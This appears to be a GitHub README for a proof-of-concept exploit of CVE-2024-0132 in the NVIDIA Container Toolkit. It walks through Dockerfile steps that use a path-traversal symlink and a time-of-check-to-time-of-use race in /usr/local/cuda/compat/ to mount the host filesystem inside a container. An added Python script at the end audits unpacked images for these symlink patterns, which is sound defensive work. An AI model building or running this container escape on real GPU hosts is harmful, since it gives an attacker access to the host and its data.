CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit

r0binak/CVE-2024-0132

CVE-2024-0132

CVE-2024-0132 PoC

Let's start by choosing a base image, because the location of the system libraries depends on it. For example, for alpine it will be /usr/lib64/, for ubuntu it will be /usr/lib/x86_64-linux-gnu. We will use ubuntu as the base image.

FROM ubuntu

The NVIDIA Container Toolkit checks the libraries in /usr/local/cuda/compat/ inside the container and then mounts them into the main library directory. For this image (ubuntu) that is /usr/lib/x86_64-linux-gnu.

Links are also mounted, so any file or directory from the image can be mounted into /usr/lib/x86_64-linux-gnu. The toolkit checks that the link resolves inside the container, so a link cannot simply use multiple ../ components for path traversal. However, this check can be circumvented by using the in-container mount via /usr/local/cuda/compat/ twice, hence TOCTOU (time of check to time of use).

Read more about the mechanism for mounting from /usr/local/cuda/compat/:

RUN mkdir -p /usr/local/cuda/compat/

Create two directories:

  1. The original directory will contain a regular file with the contents of test
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
  2. The second directory, with the same name, will contain a link with path traversal instead of a file.
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

The name libdxcore.so is chosen to satisfy filters. The major version (1337) must be different from the real driver version.

Create two links in /usr/local/cuda/compat/:

  1. The first link replaces the contents of the original directory /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/ with those of /pwn/libdxcore.so.1337/
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
  2. The second link mounts /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs to /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs. During the check it is a regular file, but at the moment of the mount it is the link that was in /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs, so the host filesystem is mounted at /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/.
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
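
For image review, the link layout built by the steps above can be detected before an image ever runs on a GPU host. The following is an added example, not part of the original repository: it walks an unpacked image root filesystem without following links and reports symlinks that climb above the image root and compat-directory links that point outside their own directory. The function names are hypothetical, the sample tree is constructed from the Dockerfile lines above, and the rule that genuine compat links name a sibling file is an assumption.

```python
import os
import tempfile

def escapes_root(link_dir, target):
    """True if `target`, followed from in-image `link_dir`, climbs above '/'."""
    depth = 0 if target.startswith("/") else len([p for p in link_dir.split("/") if p])
    for part in target.split("/"):
        depth += {"..": -1, "": 0, ".": 0}.get(part, 1)  # any other name descends
        if depth < 0:
            return True
    return False

def audit_rootfs(rootfs) -> list:
    """Return sorted (reason, in-image path) findings for an unpacked image."""
    findings = []
    for dirpath, dirs, files in os.walk(rootfs, followlinks=False):
        img_dir = os.path.normpath("/" + os.path.relpath(dirpath, rootfs))
        compat = img_dir.startswith("/usr/local/cuda") and img_dir.endswith("/compat")
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            target = os.readlink(full)  # read the link text only; never follow it
            img_path = os.path.join(img_dir, name)
            if escapes_root(img_dir, target):
                findings.append(("symlink climbs above image root", img_path))
            # Heuristic (assumption): genuine compat links name a sibling file.
            dest = os.path.normpath(os.path.join(img_dir, target))
            if compat and os.path.dirname(dest) != img_dir:
                findings.append(("compat link points outside its directory", img_path))
    return sorted(findings)

def build_sample(root):
    """Constructed sample: the links from the Dockerfile above plus one benign link."""
    for d in ("usr/local/cuda/compat", "pwn/libdxcore.so.1337"):
        os.makedirs(os.path.join(root, d))
    links = {
        "pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs": "../../../../../../../../../",
        "usr/local/cuda/compat/libxxx.so.1": "/pwn/libdxcore.so.1337",
        "usr/local/cuda/compat/libxxx.so.2": "/usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs",
        "usr/local/cuda/compat/libcuda.so.1": "libcuda.so.0.0.0",  # benign, constructed
    }
    for path, target in links.items():
        os.symlink(target, os.path.join(root, path))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        print(*audit_rootfs(root), sep="\n")
```

A finding is a reason to inspect the image by hand, not proof of malice; the compat rule in particular is a heuristic.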